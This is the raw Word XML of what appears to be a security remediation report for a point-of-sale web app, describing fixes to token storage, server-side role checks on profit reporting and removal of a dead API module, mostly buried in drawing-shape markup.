                <v:shape id="Shape 1921" style="position:absolute;width:5810;height:1333;left:0;top:5238;" coordsize="581025,133350" path="m9525,0l571500,0c574130,0,576375,930,578235,2791c580095,4651,581025,6896,581025,9525l581025,123825c581025,126467,580095,128699,578235,130559c576375,132420,574130,133350,571500,133350l9525,133350c6895,133350,4650,132420,2790,130559l0,123825l0,9525l2790,2791c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 1924" style="position:absolute;width:8096;height:1333;left:11049;top:5238;" coordsize="809625,133350" path="m9525,0l800100,0c802730,0,804975,930,806835,2791c808695,4651,809625,6896,809625,9525l809625,123825c809625,126467,808695,128699,806835,130559c804975,132420,802730,133350,800100,133350l9525,133350c6895,133350,4650,132420,2790,130559c930,128699,0,126467,0,123825l0,9525c0,6896,930,4651,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2928" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="25FB28FB" wp14:editId="2F5FF67B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4742557</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>153082</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1457325" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27448" name="Group 27448"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1457325" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1457325" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1906" name="Shape 1906"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="695325" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="695325" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="685800" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="688430" y="0"/>
                                  <a:pt x="690676" y="930"/>
                                  <a:pt x="692535" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="694395" y="4651"/>
                                  <a:pt x="695325" y="6896"/>
                                  <a:pt x="695325" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="695325" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="695325" y="135992"/>
                                  <a:pt x="694395" y="138224"/>
                                  <a:pt x="692535" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="690676" y="141945"/>
                                  <a:pt x="688430" y="142875"/>
                                  <a:pt x="685800"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09" name="Shape 1909"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1000125" y="0"/>
                            <a:ext cx="457200" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="457200" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="447675" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="450305" y="0"/>
                                  <a:pt x="452550" y="930"/>
                                  <a:pt x="454410" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="456269" y="4651"/>
                                  <a:pt x="457200" y="6896"/>
                                  <a:pt x="457200" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="457200" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="457200" y="135992"/>
                                  <a:pt x="456269" y="138224"/>
                                  <a:pt x="454410" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="452550" y="141945"/>
                                  <a:pt x="450305" y="142875"/>
                                  <a:pt x="447675" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6894" y="142875"/>
                                  <a:pt x="4649" y="141945"/>
                                  <a:pt x="2789" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="929" y="138224"/>
                                  <a:pt x="0" y="135992"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6896"/>
                                  <a:pt x="929" y="4651"/>
                                  <a:pt x="2789" y="2791"/>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48" style="width:114.75pt;height:11.25pt;position:absolute;z-index:-2147483573;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:373.43pt;mso-position-vertical-relative:text;margin-top:12.0537pt;" coordsize="14573,1428">
                <v:shape id="Shape 1906" style="position:absolute;width:6953;height:1428;left:0;top:0;" coordsize="695325,142875" path="m9525,0l685800,0c688430,0,690676,930,692535,2791c694395,4651,695325,6896,695325,9525l695325,133350c695325,135992,694395,138224,692535,140084c690676,141945,688430,142875,685800,142875l9525,142875c6895,142875,4650,141945,2790,140084c930,138224,0,135992,0,133350l0,9525c0,6896,930,4651,2790,2791c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 1909" style="position:absolute;width:4572;height:1428;left:10001;top:0;" coordsize="457200,142875" path="m9525,0l447675,0c450305,0,452550,930,454410,2791c456269,4651,457200,6896,457200,9525l457200,133350c457200,135992,456269,138224,454410,140084c452550,141945,450305,142875,447675,142875l9525,142875c6894,142875,4649,141945,2789,140084c929,138224,0,135992,0,133350l0,9525c0,6896,929,4651,2789,2791c4649,930,6894,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The token now lives in a module-scoped variable ordinary memory, not enumerable, gone when the tab closes with a per-tab </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> mirror so a refresh does not sign the cashier out mid-sale. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AuthContext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> calls </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /me</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> on boot and uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C73B1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>response</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the authority on identity and role; on failure it explicitly does </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> fall back to the cached record. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>clearAllAppStorage</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clears the token, the user cache, both legacy keys and the five business-data keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14061395" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="49" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>adminOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> added to </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/sales/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">profit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Cost and margin reporting moved behind </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> middleware server-side (V-02), so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482A0229" w14:textId="58555BAB" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="274"/>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3952" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0F7FA999" wp14:editId="2F9A0F0D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4066281</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-182849</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1162050" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27451" name="Group 27451"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1162050" cy="304800"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1162050" cy="304800"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1927" name="Shape 1927"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="123825" y="0"/>
                            <a:ext cx="342900" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="342900" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="333375" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="336005" y="0"/>
                                  <a:pt x="338250" y="930"/>
                                  <a:pt x="340110" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="341970" y="4651"/>
                                  <a:pt x="342900" y="6896"/>
                                  <a:pt x="342900" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="342900" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="342900" y="126467"/>
                                  <a:pt x="341970" y="128699"/>
                                  <a:pt x="340110" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="338250" y="132420"/>
                                  <a:pt x="336005" y="133350"/>
                                  <a:pt x="333375" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126467"/>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31" name="Shape 1931"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="171450"/>
                            <a:ext cx="1162050" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1162050" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1152525" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1155156" y="0"/>
                                  <a:pt x="1157401" y="930"/>
                                  <a:pt x="1159260" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1161120" y="4651"/>
                                  <a:pt x="1162050" y="6896"/>
                                  <a:pt x="1162050" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1162050" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1162050" y="126454"/>
                                  <a:pt x="1161120" y="128699"/>
                                  <a:pt x="1159260" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1157401" y="132420"/>
                                  <a:pt x="1155156" y="133350"/>
                                  <a:pt x="1152525"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51" style="width:91.5pt;height:24pt;position:absolute;z-index:-2147483551;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:320.18pt;mso-position-vertical-relative:text;margin-top:-14.3977pt;" coordsize="11620,3048">
                <v:shape id="Shape 1927" style="position:absolute;width:3429;height:1333;left:1238;top:0;" coordsize="342900,133350" path="m9525,0l333375,0c336005,0,338250,930,340110,2791c341970,4651,342900,6896,342900,9525l342900,123825c342900,126467,341970,128699,340110,130559c338250,132420,336005,133350,333375,133350l9525,133350c6895,133350,4650,132420,2790,130559c930,128699,0,126467,0,123825l0,9525c0,6896,930,4651,2790,2791c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 1931" style="position:absolute;width:11620;height:1333;left:0;top:1714;" coordsize="1162050,133350" path="m9525,0l1152525,0c1155156,0,1157401,930,1159260,2791c1161120,4651,1162050,6896,1162050,9525l1162050,123825c1162050,126454,1161120,128699,1159260,130559c1157401,132420,1155156,133350,1152525,133350l9525,133350c6895,133350,4650,132420,2790,130559c930,128699,0,126454,0,123825l0,9525c0,6896,930,4651,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4976" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="44402F9A" wp14:editId="6D6F0487">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2656582</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>160050</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="638175" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27453" name="Group 27453"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="638175" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="638175" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1935" name="Shape 1935"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="638175" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="638175" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="628650" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="631280" y="0"/>
                                  <a:pt x="633525" y="930"/>
                                  <a:pt x="635385" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="637245" y="4651"/>
                                  <a:pt x="638175" y="6896"/>
                                  <a:pt x="638175" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="638175" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="638175" y="126454"/>
                                  <a:pt x="637245" y="128699"/>
                                  <a:pt x="635385" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="633525" y="132420"/>
                                  <a:pt x="631280" y="133350"/>
                                  <a:pt x="628650" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126454"/>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53" style="width:50.25pt;height:10.5pt;position:absolute;z-index:-2147483545;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:209.18pt;mso-position-vertical-relative:text;margin-top:12.6023pt;" coordsize="6381,1333">
                <v:shape id="Shape 1935" style="position:absolute;width:6381;height:1333;left:0;top:0;" coordsize="638175,133350" path="m9525,0l628650,0c631280,0,633525,930,635385,2791c637245,4651,638175,6896,638175,9525l638175,123825c638175,126454,637245,128699,635385,130559c633525,132420,631280,133350,628650,133350l9525,133350c6895,133350,4650,132420,2790,130559c930,128699,0,126454,0,123825l0,9525c0,6896,930,4651,2790,2791c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> figures no longer reach an employee's browser at all. The dead duplicate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/services/api.js</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> which imported from a module that does not exist and read a divergent </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>auth_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> key logout never cleared deleted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F043380" w14:textId="77777777" w:rsidR="0011533D" w:rsidRDefault="0011533D" w:rsidP="00C73B1A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28DC3629" w14:textId="77777777" w:rsidR="0011533D" w:rsidRDefault="0011533D" w:rsidP="0011533D">
      <w:pPr/>
    </w:p>
    <w:p w14:paraId="33E9BC98" w14:textId="77777777" w:rsidR="0011533D" w:rsidRDefault="0011533D" w:rsidP="0011533D">
      <w:pPr/>
    </w:p>
    <w:p w14:paraId="54180E13" w14:textId="77777777" w:rsidR="0011533D" w:rsidRDefault="0011533D" w:rsidP="0011533D">
      <w:pPr/>
    </w:p>
    <w:p w14:paraId="7EA77C85" w14:textId="77777777" w:rsidR="0011533D" w:rsidRDefault="0011533D" w:rsidP="0011533D">
      <w:pPr/>
    </w:p>
    <w:p w14:paraId="7657C7F9" w14:textId="77777777" w:rsidR="0011533D" w:rsidRDefault="0011533D" w:rsidP="0011533D">
      <w:pPr/>
    </w:p>
    <w:p w14:paraId="24F2C1DA" w14:textId="77777777" w:rsidR="0011533D" w:rsidRDefault="0011533D" w:rsidP="0011533D">
      <w:pPr/>
    </w:p>
    <w:p w14:paraId="73DF824C" w14:textId="77777777" w:rsidR="0011533D" w:rsidRPr="0011533D" w:rsidRDefault="0011533D" w:rsidP="0011533D">
      <w:pPr/>
    </w:p>
    <w:p w14:paraId="7C82F8DD" w14:textId="77777777" w:rsidR="0011533D" w:rsidRDefault="0011533D" w:rsidP="00C73B1A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BF6C18D" w14:textId="3F38AE49" w:rsidR="00345BB3" w:rsidRDefault="008125F0" w:rsidP="00C73B1A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>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V-17 · Unvalidated uploads reached a vulnerable parser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0B9E52" w14:textId="34C06302" w:rsidR="00C73B1A" w:rsidRPr="00C73B1A" w:rsidRDefault="00F4495C" w:rsidP="00C73B1A">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="008C216B">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546C0B9F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="224"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6887F1A9" wp14:editId="424EE23F">
                <wp:extent cx="6480126" cy="1839007"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="27424" name="Group 27424"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
